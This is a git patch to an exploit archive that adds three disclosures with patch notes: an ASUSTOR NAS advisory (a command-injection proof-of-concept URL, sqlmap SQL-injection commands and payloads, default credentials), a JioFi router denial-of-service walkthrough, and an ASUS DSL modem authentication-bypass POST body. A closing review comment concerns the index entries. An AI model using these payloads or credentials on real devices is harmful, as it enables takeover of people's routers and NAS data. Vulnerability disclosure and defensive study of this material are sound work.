From 2e282df4a8171a716c214e6e127e2c26722e8d7c Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 16 Aug 2018 05:02:01 +0000
Subject: [PATCH] DB: 2018-08-16
3 changes to exploits/shellcodes
JioFi 4G M2S 1.0.2 - Denial of Service (PoC)
ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection
ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
---
 exploits/cgi/webapps/45200.txt | 127 ++++++++++++++++++++++++++++
 exploits/hardware/dos/45199.txt | 24 ++++++
 exploits/hardware/webapps/45201.txt | 21 +++++
 files_exploits.csv | 3 +
 4 files changed, 175 insertions(+)
 create mode 100644 exploits/cgi/webapps/45200.txt
 create mode 100644 exploits/hardware/dos/45199.txt
 create mode 100644 exploits/hardware/webapps/45201.txt
diff --git a/exploits/cgi/webapps/45200.txt b/exploits/cgi/webapps/45200.txt
new file mode 100644
index 000000000..55928b123
--- /dev/null
+++ b/exploits/cgi/webapps/45200.txt
@@ -0,0 +1,127 @@
+Product - ASUSTOR ADM - 3.1.0.RFQ3 and all previous builds
+Vendor - https://www.asustor.com/
+Patch Notes - http://download.asustor.com/download/docs/releasenotes/RN_ADM_3.1.3.RHU2.pdf
+
+Issue: The Asustor NAS appliance on ADM 3.1.0 and before suffer from
+multiple critical vulnerabilities. The vulnerabilities were submitted
+to Asustor in January and February 2018. Several follow-up requests
+were made in an attempt to obtain vendor acknowledgement, however no
+correspondance was ever received. Nevertheless, the vendor did patch
+the RCE issue in the 3.1.3 ADM release on May 31, 2018.
+
+Resolution: Upgrade to newest Asustor firmware, ADM 3.1.3.
+-----------------------------------------------------------------------------------
+
+CVE-2018-11510
+Remote Command Execution (Unauthenticated)
+CWE-78 - Improper Neutralization of Special Elements used in an OS Command
+ASUSTOR ADM - 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : The ASUSTOR ADM 3.1.0.RFQ3 NAS portal suffers from an
+unauthenticated remote code execution vulnerability in the
+portal/apis/aggrecate_js.cgi file by embedding OS commands in the
+'script' parameter. The application fails to santitize user input
+after the cgi file executes a call to a local shell script.
+
+Example POC:
+https://:8001/portal/apis/aggrecate_js.cgi?script=launcher%22%26ls%20-ltr%26%22
+
+Exploitation of this vulnerability allows an attacker execution of
+arbitrary commands on the host operating system, as the root user,
+remotely and unauthenticated. This is a complete compromise of the
+appliance.
+
+Exploits with Metasploit module can be found here:
+https://github.com/mefulton/CVE-2018-11510/
+------------------------------------------------------------------------------------
+
+CVE-2018-11511
+Blind SQL Injections
+CWE-89: Improper Neutralization of Special Elements used in an SQL Command
+ASUSTOR Photo Gallery Application - ADM 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : The tree list functionality in the photo gallery
+application in ASUSTOR ADM 3.1.0.RFQ3 has a SQL injection
+vulnerability that affects the 'album_id' or 'scope' parameter via a
+photo-gallery/api/album/tree_lists/ URI.
+
+POC
+sqlmap -u "https:///photo-gallery/api/album/tree_lists/"
+--data="album_id=123456789&start=0&limit=100&order=name_asc&api=v2"
+ --random-agent --risk=2 --dbms=mysql
+
+Parameter: album_id (POST)
+ Type: boolean-based blind
+ Title: AND boolean-based blind - WHERE or HAVING clause
+ Payload: album_id=106299411 AND
+4644=4644&start=0&limit=100&order=name_asc&api=v2
+
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: album_id=106299411 AND
+SLEEP(5)&start=0&limit=100&order=name_asc&api=v2
+
+
+sqlmap -u "https://IP/photo-gallery/api/photo/search/"
+--data="keyword=jpg&scope=123456789&start=0&limit=100&order=name_asc&api_mode=browse&api=v2"
+--random-agent --dbms=mysql --risk=2
+
+Parameter: scope (POST)
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0.12 AND time-based blind
+ Payload: keyword=jpg&scope=106299414 AND
+SLEEP(5)&start=0&limit=100&order=name_asc&api_mode=browse&api=v2
+------------------------------------------------------------------------------------
+
+CVE-2018-11509
+Default credentials and remote access (Multiple Applications)
+CWE-255 Credentials Management
+ASUSTOR ADM 3.1.0.RFQ3
+------------------------------------------
+
+Weakness : When the end user completes setup for the ASUSTOR Nas
+appliance, a single congratulations web page appears, usually on port
+80, stating setup is complete. This "setup complete" web page however
+is served publicly, and is available to anyone with no authentication.
+>From this page it is possible to access all of the add-on applications
+the end usr installs on the NAS, which are available from their online
+repository, by simply browsing to each add-on directory.
+
+For many of these apps, for example phpmyadmin. virtualbox, owncloud,
+photo-gallery, etc., the files are installed under the /volume1/Web/
+folder, which is t the same directory as the 'setup complete' page is
+located.
+
+URL http:///phpmyadmin/ username/password - root:admin
+URL http:///virtualbox/ username/password - admin:admin
+URL http:///wordpress/ setup file available
+
+The application does prompt the user to change the admin account for
+the NAS itself, however, the end user is never prompted to change the
+default passwords on the add-on applications.
+
+This allows an attacker root level access to the application which in
+turn can be used to upload a webshell onto the appliance. It also
+allow access to all data the end user uploads to the NAS.
+
+Furthermore, the NAS itself has a default account nvradmin, which has
+permission to log into the admin portal. While the nvradmin account
+does not have most admin permissions, it still allows an attacker to
+access many of the browser file functions, and gain a foothold on the
+appliance.
+
+URL http://:8001/portal/ username/password nvradmin:nvradmin
+
+An attacker can determine installed applications and attack default
+credentials that are not changed upon NAS initialization, which
+enables them to compromise end user data or gain root access on the
+appliance.
+-----------------------------------------------------------------------------------
+
+[Researchers]
+Kyle Lovett - (twitter - @SquirrelBuddha)
+Matthew Fulton (twitter - @haqur)
+https://www.purehacking.com/blog/matthew-fulton/
+https://github.com/mefulton/CVE-2018-11510/
\ No newline at end of file
diff --git a/exploits/hardware/dos/45199.txt b/exploits/hardware/dos/45199.txt
new file mode 100644
index 000000000..9702094f5
--- /dev/null
+++ b/exploits/hardware/dos/45199.txt
@@ -0,0 +1,24 @@
+# Exploit Title: JioFi 4G M2S 1.0.2 - Denial of Service (PoC)
+# Exploit Author: Vikas Chaudhary
+# Date: 2018-07-26
+# Vendor Homepage: https://www.jio.com/
+# Hardware Link: https://www.amazon.in/JioFi-Hotspot-M2S-Portable-Device/dp/B075P7BLV5/ref=sr_1_1?s=computers&ie=UTF8&qid=1531032476&sr=1-1&keywords=JioFi+M2S+Wireless+Data+Card++%28Black%29
+# Version: JioFi 4G Hotspot M2S 150 Mbps Wireless Router
+# Category: Hardware
+# Tested on: Windows 10
+# CVE: CVE-2018-15181
+
+# Proof Of Concept:
+01- First Open BurpSuite
+02- Make Intercept on
+03 -Go to your Wifi Router Gateway and log in [i.e http://192.168.225.1 ]
+04- Go To => Setting=> WiFi
+06- In SSID type "Testing" and in Security Key type "12345678" .
+06- Click on Apply
+07- Burp will Capture the Intercepts.
+08- Copy this code "onmouseover=alert(1) and paste it after the SSID name and Security Key
+09- You will see that your Net connection will lost and Router will shutdown and Restart..
+10- The Router will RESTART and your SSID name will change to this "onmouseover=alert(1)//
+11- Now again go to Wifi router gateway and loged in
+12- You will see that the SSID name and Security Key will be Blank
+13- Again try to Change the SSID name - YOU CAN'T , If you force it to change , You have to OPEN Your Wireless Security and that is unsecure . (Open wifi=> Without Password)
\ No newline at end of file
diff --git a/exploits/hardware/webapps/45201.txt b/exploits/hardware/webapps/45201.txt
new file mode 100644
index 000000000..43ff491b7
--- /dev/null
+++ b/exploits/hardware/webapps/45201.txt
@@ -0,0 +1,21 @@
+# Title: ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass
+# Author: AmnBAN team
+# Date: 2018-08-06
+# Vendor Homepage: https://www.asus.com/Networking/DSLN10_C1_with_5dBi_antenna/
+# Sofrware version: 1.1.2.2_17
+# CVE: N/A
+
+# 1. Description:
+# In ASUS-DSL N10 C1 modem Firmware Version 1.1.2.2_17 there is login_authorization
+# parameter in post data, that use for authorization access to admin panel,
+# the data of this parameter is not fully random and you can use old data
+# or data of another device to access admin panel.
+
+# 2. Proof of Concept:
+# Browse http:///login.cgi
+
+# Send this post data:
+group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=YWRtaW46MQ%3D%2D
+
+# Or this post data:
+group_id=&action_mode=&action_script=&action_wait=5¤t_page=Main_Login.asp&next_page=%2Fcgi-bin%2FAdvanced_LAN_Content.asp&login_authorization=FWRtaW46MQ%3D5D
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 43cebfc4d..c4f621de8 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6045,6 +6045,7 @@ id,file,description,date,author,type,platform,port
 45186,exploits/windows/dos/45186.py,"Acunetix WVS 10.0 Build 20150623 - Denial of Service (PoC)",2018-08-13,"Javier Enrique Rodriguez Gutierrez",dos,windows,
 45187,exploits/hardware/dos/45187.py,"PLC Wireless Router GPN2.4P21-C-CN - Denial of Service",2018-08-13,"Chris Rose",dos,hardware,
 45191,exploits/windows_x86/dos/45191.py,"Switch Port Mapping Tool 2.81.2 - 'Name Field' Denial of Service (PoC)",2018-08-13,"Shubham Singh",dos,windows_x86,
+45199,exploits/hardware/dos/45199.txt,"JioFi 4G M2S 1.0.2 - Denial of Service (PoC)",2018-08-15,"Vikas Chaudhary",dos,hardware,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -39797,3 +39798,5 @@ id,file,description,date,author,type,platform,port
 45190,exploits/multiple/webapps/45190.txt,"IBM Sterling B2B Integrator 5.2.0.1/5.2.6.3 - Cross-Site Scripting",2018-08-13,"Vikas Khanna",webapps,multiple,
 45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
 45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
+45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
+45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
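Review bot: The added 45200 row in the second hunk is an incomplete index entry for the advisory it points at: its author column holds only `"Kyle Lovett"`, while exploits/cgi/webapps/45200.txt credits two researchers (Kyle Lovett and Matthew Fulton) under [Researchers], so the second author is lost from the catalogue. The same row's description names only the RCE and SQL injection, yet the file also documents a third issue (CVE-2018-11509, default credentials on the NAS and bundled add-ons), which anyone searching the index by CVE or weakness class will not find. I would extend the description to `"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection / Default Credentials"` and list both authors in whatever form this file uses for multiple authors. The 45199 and 45201 rows match their files' title and author headers and need no change.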